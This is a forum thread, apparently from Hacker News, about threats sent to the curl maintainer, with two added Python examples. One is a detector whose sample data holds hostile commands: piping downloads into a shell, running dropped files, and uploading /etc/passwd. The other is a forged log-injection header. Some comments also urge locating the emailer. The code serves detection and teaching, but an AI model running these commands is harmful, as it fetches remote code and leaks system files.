On the matter of "inevitability of progress": yep, I even think it applies to a much bigger extent. I just don't see how this is connected to the troubles of the-victim-of-curl guy.
Oh, the statement just made me pause and think that's all.
> but I struggle to think of a situation where curl would have been an actual culprit.
I agree, I think it's much more likely that there was a 2 stage type of exploit where curl was used to download the second stage locally on the machine. That's at least how curl (or wget) is used on hackthebox.eu (where everyone hacks boxes for fun).
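The two-stage pattern described above (curl or wget fetches the real payload, so the downloader's name is all over the evidence while the bug lived elsewhere) is the kind of thing a detection rule can pick out of process telemetry. Below is an added example, not from the thread or from any published ruleset: a small Python classifier run over constructed command lines, flagging the usual second-stage tells (fetch piped into an interpreter, output dropped into a staging directory and executed, TLS verification switched off, a local file uploaded). The sample command lines, IPs and the heuristics themselves are assumptions for the example.

```python
import re
from dataclasses import dataclass, field

# Constructed sample command lines, as an EDR or auditd pipeline might hand
# them to a detection rule. They are not taken from the incident in the thread.
SAMPLE_CMDLINES = [
    "curl -s http://198.51.100.7/stage2.sh | sh",
    "curl -fsSL -o /tmp/.x http://198.51.100.7/payload && chmod +x /tmp/.x && /tmp/.x",
    "wget -q -O /dev/shm/dropper http://203.0.113.9/d",
    "curl -k -A 'Mozilla/5.0' https://203.0.113.9/u -d @/etc/passwd",
    "curl https://api.github.com/repos/curl/curl/releases/latest",
    "wget https://example.org/notes.txt -O ~/notes.txt",
]

DOWNLOADERS = ("curl", "wget")
STAGING_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/")

# Heuristics chosen for the example; what a real rule looks at is a tuning
# decision, not something taken from a published signature set.
PIPE_TO_INTERP = re.compile(r"\|\s*(?:sh|bash|zsh|python3?|perl)\b")
OUTPUT_FLAG = re.compile(r"(?<!\S)(?:-o|-O|--output)\s+(\S+)")
EXEC_AFTER = re.compile(r"chmod\s+\+x\s+\S+|&&\s*/\S+")
INSECURE = re.compile(r"(?<!\S)(?:-k|--insecure)(?!\S)")
UPLOAD = re.compile(r"(?<!\S)(?:-d|--data(?:-binary)?|-T|--upload-file)\s+@(\S+)")


@dataclass
class Finding:
    cmdline: str
    reasons: list = field(default_factory=list)


def classify(cmdline: str) -> Finding:
    # Only look at invocations of the two downloaders; everything else is
    # somebody else's rule.
    finding = Finding(cmdline)
    parts = cmdline.split()
    if not parts or parts[0] not in DOWNLOADERS:
        return finding
    if PIPE_TO_INTERP.search(cmdline):
        finding.reasons.append("fetched content piped straight into an interpreter")
    out = OUTPUT_FLAG.search(cmdline)
    if out and out.group(1).startswith(STAGING_DIRS):
        finding.reasons.append(f"output written to staging directory: {out.group(1)}")
    if out and EXEC_AFTER.search(cmdline):
        finding.reasons.append("downloaded file made executable or run in the same command")
    if INSECURE.search(cmdline):
        finding.reasons.append("TLS certificate verification disabled")
    up = UPLOAD.search(cmdline)
    if up:
        finding.reasons.append(f"local file sent to remote host: {up.group(1)}")
    return finding


def suspicious(cmdlines):
    # Keep only the command lines that tripped at least one heuristic.
    return [f for f in map(classify, cmdlines) if f.reasons]


if __name__ == "__main__":
    for f in suspicious(SAMPLE_CMDLINES):
        print(f.cmdline)
        for r in f.reasons:
            print("   -", r)
```

On the sample, the first four lines are flagged and the two legitimate downloads pass. Note that the rule keys on how the downloader is used, not on the fact that it is curl: the point of the thread is that the tool's presence is not the finding.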
> Open-source code like curl is inevitable when a society gains internet
Maybe, but there's maybe an alternate universe that doesn't begin with such a dumbass implementation of the web.
"Excuse me everybody, how about we not make it common for clients to describe themselves with a simple plaintext string and not have servers expect to blithely log that same string as if the invention of packet switching predates the invention of lying."
Perhaps ours is the only universe where the grad student who was supposed to utter that missed the bus that day.
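The complaint above is that clients describe themselves with a free-form string and servers log it as if it were true. The snippet below is an added example (not from the thread or from any web server's code) showing the concrete consequence: a User-Agent containing a newline lets a client write a second, fully parseable record into a naive access log, attributed to an IP of its choosing; escaping control characters before logging keeps it to one record. The log format, the regex, the IPs and the forged header are constructed for the example.

```python
import re

# Constructed User-Agent value. A client can send anything here (curl -A '...'),
# so a logger that copies it verbatim lets the client write log lines of its
# choosing. This one closes the quoted field and starts a fake second record.
FORGED_UA = 'curl/7.68.0"\n198.51.100.7 "GET /admin HTTP/1.1" 200 "-'

# Simplified access-log record used for the example:  ip "request" status "ua"
# The quoted fields accept backslash escapes so the hardened logger's output
# still parses.
_FIELD = r'"((?:[^"\\]|\\.)*)"'
RECORD_RE = re.compile(rf'^(\S+) {_FIELD} (\d{{3}}) {_FIELD}$')


def naive_log_line(client_ip: str, request: str, status: int, user_agent: str) -> str:
    # The behaviour the comment above objects to: trust the header as-is.
    return f'{client_ip} "{request}" {status} "{user_agent}"'


def escape_field(value: str) -> str:
    # Encode CR, LF, quotes, backslashes and other control characters so that
    # one request can never produce more than one record.
    out = []
    for ch in value:
        if ch == "\n":
            out.append("\\n")
        elif ch == "\r":
            out.append("\\r")
        elif ch in ('"', "\\"):
            out.append("\\" + ch)
        elif ord(ch) < 0x20 or ord(ch) == 0x7F:
            out.append(f"\\x{ord(ch):02x}")
        else:
            out.append(ch)
    return "".join(out)


def safe_log_line(client_ip: str, request: str, status: int, user_agent: str) -> str:
    return f'{client_ip} "{escape_field(request)}" {status} "{escape_field(user_agent)}"'


def parse_records(log_text: str):
    # What an analyst or a SIEM would see: one tuple per physical line that
    # matches the record format.
    records = []
    for line in log_text.splitlines():
        m = RECORD_RE.match(line)
        if m:
            records.append((m.group(1), m.group(2), int(m.group(3)), m.group(4)))
    return records


if __name__ == "__main__":
    naive = naive_log_line("203.0.113.5", "GET /login HTTP/1.1", 401, FORGED_UA)
    safe = safe_log_line("203.0.113.5", "GET /login HTTP/1.1", 401, FORGED_UA)
    print("naive logger produced", len(parse_records(naive)), "records:")
    for r in parse_records(naive):
        print("  ", r)
    print("hardened logger produced", len(parse_records(safe)), "record:")
    print("  ", parse_records(safe)[0])
```

With the forged header, the naive logger emits a bogus "198.51.100.7 got 200 on /admin" record that a later investigation would take at face value; the hardened logger emits a single record for 203.0.113.5 with the whole payload visible, escaped, inside the User-Agent field.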
Curl is a tool; and just like a knife can be used to rob a person it can be abused for malicious purposes. That's unavoidable no matter what kind of license it has.
I wouldn't be surprised if this interview was 3 to 5, or even more years ago. Sadly, I really don't remember, but this little tidbit stood out to me at the time. I wouldn't be surprised if the "employee" is a really high ranking one, or one of the founders even.
Death threats are pretty normal for open source devs but I actually got a rape threat recently, which kind of surprised me. Cultural differences from international communities. It was not in English.
Daniel was probably warned by many not to respond a second time, or maybe he thinks that this emailer is a crank who isn't worth responding to, but I kinda wish he would. The emailer is either experiencing the effects of curl exploits, and doing a bad job of explaining it, or is very confused about the role curl plays in exploits in general. I'm not willing to assume the latter, although I think that's the assumption most are making here.
Yeah I think a reply ignoring the threat and just explaining what Curl is would be the best approach here.
Either the person is just a crank and in that case no harm done, or the person has legitimately been affected by an exploit and at the very least it will inform them of what actually happened and how Curl isn't to blame at all.
I agree: it's a good way to handle angry people by taking it in a soft tone and explaining; it may have a positive impact on the person because someone cares, and if the person was just angry at the moment it may also help them learn something. I often tend to take some time to respond to such kind of angry messages though, you really need to make an effort on yourself to get back to a "kind" state of mind for it to work.
I think this is a good case for being pseudo-anonymous online, even in free software. The vast majority of the community is nice, but it only takes one crackpot to make your life difficult. If you are pseudo-anonymous, you are at least protected, both physically and reputation wise, on the internet. We've always told kids to not give out their name or address online; it might be good advice for everyone.
This person clearly doesn’t understand what software is and how it works. If he really lost a multi million dollar defense project to a hack it’s not a bad thing at all.
Of course this has nothing to do with curl or any other software, one can only get hacked because of their ineptitude.
I feel like the sender should take it a bit further by blaming the sun for nurturing the plants that feed the animals that sustain the belly of the coder Daniel. In other words, go out on their lawn and shake a mighty fist towards the sky.
This surfaces an important point that our communities (online, offline, families, etc) have no easy solution for: if indeed someone does have a mental illness* how do you factor that in and make allowances for it? How do you quantify that the actions come from someone who is mentally unwell? And without diagnostic tooling, how do you know they are mentally ill?
* In this case there is no way to confirm if the sender/s are mentally ill because all you have is inference to play against the words written and the images sent to Daniel.
I see someone who ended up in a bad situation because they messed up, and in their anger tries to blame someone else instead of taking responsibility.
I use free and open source software everyday in my products and I am fully aware that all of them have licenses specifically telling me that there is no warranty or liability of damages. If something goes wrong, it's on me, I made a wrong choice and I have to deal with the consequences.
And threats are not okay and should be reported to the authorities.
I have dealt with a similar situation, in a sense more than once, and my strategy was to first integrate the identified risk into my model and then compare it against my own risk profile. If the risk was above a threshold (simplifying), I take an offensive posture in cases like these.
For example, in this case, I would minimally identify and locate the individual responsible for the email. I think that is doable.
For someone who claims to have done all that, it seems odd they blame curl for the solarwinds hack... I’m guessing the idiot went through the source of some exploit dump and just decided that whoever was in the license files was the one who wrote the root kit. Because everyone knows malware authors leave their real email address in their payload.
I suppose this is an argument in favour of the asset downloading scheme pioneered by maven/gradle and nowadays adopted by many languages: The unhinged and/or ignorant won't see sane/good library code mixed into worse code that uses the libraries.
But oh god, it's not exactly a technical argument.
After reading it a few times, I think it's not about some script kiddie using curl to hack into his system.
Although I condemn Al Nocai's method, I feel for him and I am inclined to adopt the contrarian opinion that he probably got screwed because of the bad quality of curl.
The deeper underlying systemic problem is that open-source is a way to disclaim all responsibilities. When some open-source project has some level of reach there needs to be quality requirements and regular security audits. (like they (last?) did in 2016, https://daniel.haxx.se/blog/2016/11/23/curl-security-audit/)
Otherwise it's like the OpenSSL's heartbleed story where a few unpaid project maintainers hold the keys to the world.
In today's interdependent world, when trying to build something, we are more and more reliant on the quality of the library we use. As a product builder facing the client you get to bear the responsibility when your client has a problem because of a library you use. But when open-source software removed the possibility of competing solutions by providing free "as is" software, you can't realistically choose not to use it, and you are the one left holding the bag and paying the price for others' mistakes.
That's indeed the failure of the system: something sensitive used by billions not being able to pay for a regular audit.
If no one wants to pay for it to have the required quality, why not make it a public utility properly funded by tax, as a public service; instead of later paying the costs in various forms of the consequences of the vulnerabilities.
I haven't seen much evidence of this happening on anything approaching a wide scale. For example the piece of software in the article is used almost everywhere, governments, companies etc and yet it still cannot get the funds for yearly audits.
If he's the one using cURL, does that mean that he is one of the kids in the phrase 'You built a formula 1 race car and tossed the keys to kids with ego problems.'?
cURL is a complex beast, it handles plenty of various network protocols, and does it in low-level C, therefore has a lot of potential for exploits if there is a bug like wrongly formatted strings, or buffer overflows. It's a nest for zero-days.
The code is available to anyone to look for such bugs, even the kids with ego problems (aka the hackers). Hackers like curl because it's a nice tool that indeed help them a lot.
Everyone uses curl, willingly or not, embedded by another library which needs some network protocol. Pass a filename that starts with "protocol://... " to any buggy program that will try to open it, and then one branch somewhere inside libcurl will get called. If you give the right magic string, you get a remote shell.
Why couldn't someone who doesn't want to use an open source library just write their own? Just because it exists doesn't mean you are forced to use it--
Most often it's a dependency of a dependency. The library you really want to use is using the library you don't want to use. Economically it's not possible to not depend on anything, so you take some risk, and hope it doesn't later bite you back.
> You built a formula 1 race car and tossed the keys to kids with ego problems.
I laughed. Curl: The Formula 1 race car of command line tools!
Aside from that, I am surprised that the harasser followed up in a mostly non-violent way. I expected an absolute troll. Sadly in fact it seems the harasser is in need of psychiatric attention.
The person needs care and help and patient kindness. The person wants to resemble the late Terry Davis of TempleOS. The person isn't a serious threat from a sentence. The Internet is the threat. That's the fear.
Blaming Daniel for being hacked is like getting robbed and blaming sneaker manufacturers because the robber happened to wear a pair of sneakers.
It's the domain of the contact email for curl. I think that is exactly what this person latched on to, given it was the first screenshot this person sent. Of course, Daniel is not to blame for people's uninformed reactions. But, one might point to this as a potential reason to avoid drawing the attention of the misinformed.
I think the elephant in the room is putting a personal email there in the first place. Honestly, you shouldn't act surprised you've received a threat, when you already know people constantly misunderstand that thing. In fact, it is quite literally like writing your phone number on a concrete block next to some dumpster in LA where all sorts of junkies constantly gather together, and then taking a personal offense when you receive a call from somebody who thinks this is Satan's phone number and he is the one who has been chosen to defeat you.
But, yeah, the domain itself obviously doesn't help the matter.
Delusions of grandeur, scapegoating, catastrophization, odd phrases, and lack of ownership.
Sounds like a mental health crisis or a sick joke. Either way, whoever was behind it didn't accomplish anything.
There can be situations where tools get inappropriately placed as critical infrastructure that are developed as hobbies by people with hobbyist-shrug attitudes, but this wouldn't be a constructive way to address it. Blame or personal attacks don't make improvements.
For others coming here who didn't immediately get the joke either: the kiddies attacking the sender were using curl to steal data, it wasn't an exploit in curl itself.
As per other advice, mental illness, best case is to ignore; the world is too big to help everyone online personally.
> JS Stochastic templating utilizing comparison expressions to write to data registers
This has zero meaning? I can't even guess what it might be?
> I lost over $15k in prototyping alone from bullshit rooting to the charge arbitrators.
"charge arbitrators" is not a thing. It's normally verb, noun. Not adjective, noun.
I'd almost go a nasty GPT-2/GPT-3. There's complexity but no links, this is 3 unrelated things - "Multiple Sigover attack vectors utilizing favicon XML injection"
Judging by what transpired and how the other person behaves, it sounds like he got what he deserved. Such a rotten personality shouldn't be allowed around people, let alone computers.
> As an open source maintainer for over twenty years, I know flame wars and personal attacks and I have a fairly thick skin and I don't let words get to me easily. It took me a minute to absorb and realize it was actually meant as a direct physical threat. It found its way through and got to me. This level of aggressiveness is not what I'm prepared for.
Posting this is just an open invitation for people to send you more threats.
Don’t want to delve into any accusatory territory, but I’ve seen several new accounts with names following a similar pattern that post such material and dip.
Not by choice. I'm usually auto-flagged/shadow-banned/banned after one or two comments, so I make a new account to join the discussion when necessary. I would prefer to use the same account but it's out of my hands.
The mod warned me that using a new name each time could be interpreted as deceptive so I've been using the same name (with an incremented suffix) for a little while now to not obscure my identity.
> I'm usually auto-flagged/shadow-banned/banned after one or two comments,
Maybe there is a reason? I had my comments downvoted, but thinking about this, it was deserved, those comments were really not constructive and severely lacking in empathy. No one normal likes reading such things and HN is a place where it matters. It's not a place to just vent.
No one 'normal' in my world would like most of the popular comments here (except to laugh at them). That's subjective.
I don't believe that I should be excluded from participating in good faith because of my race or political views. HN should be a place that welcomes diversity of thought, be it from a BLM activist or a White nationalist.
People are welcome to hit the disagree button. I don't care about that. I don't even mind much if I'm brash and the comment is flagged, as above.
I do care when my civil comments are flagged for wrongthink, and I do care when they are immediately censored. Then it's time for a new account.
Maybe it's now time to change your license to be more "unfree". Like adding contact or usage restrictions for psychopaths or warfarer. One does not need to deal with this.
I worked for a cryptocurrency project which was using my open source project as one of the main components and the price of that cryptocurrency dropped in price by about 99% from its peak... Thousands of anonymous people lost huge sums. I was a bit worried at times about blame potentially being misdirected towards me but it didn't happen, people were supportive in fact. Token price is back up high now.
Yes it is. And also, all the other times. This has nothing to do with any vulnerability in curl, just that someone might have used curl to script requests. You might as well attack the HTTP protocol.
The person saw some exploit with curl headers, which damaged their life. That's upsetting, even if the email is misdirected, because Daniel just provided the infrastructure, and did not cause the specific abuse. What is wrong is the threat to life.
The second thing that is wrong is to respond to the second email by doxxing the author to the public. The second email showed that the threat was likely not specific and imminent, but venting. A reasonable response would be to notify the police. Or to reveal this case to the public explaining why this is misdirected, but without the author's name.
I disagree with the idea that sharing a singular name of someone you had a conversation with is doxxing. Especially one voluntarily sent without a prior agreement that the email conversation would remain private.
I have nothing but respect for Daniel, but having a domain like haxx.se while being a maintainer of a general purpose powerful and popular(!) software tool is not smart.
This liability could've been mitigated to some degree by having a more innocuous sounding domain name. Having it as is, given enough time and thanks to the tremendous popularity of libcurl/curl someone somewhere is going to jump to conclusions that Daniel is responsible for making this "race car" hacking tool that script kiddies are now using to wreck his life.
Stallman has failed culturally, distance yourself from the "hacking" culture of the past if you care about your marketability and reputation.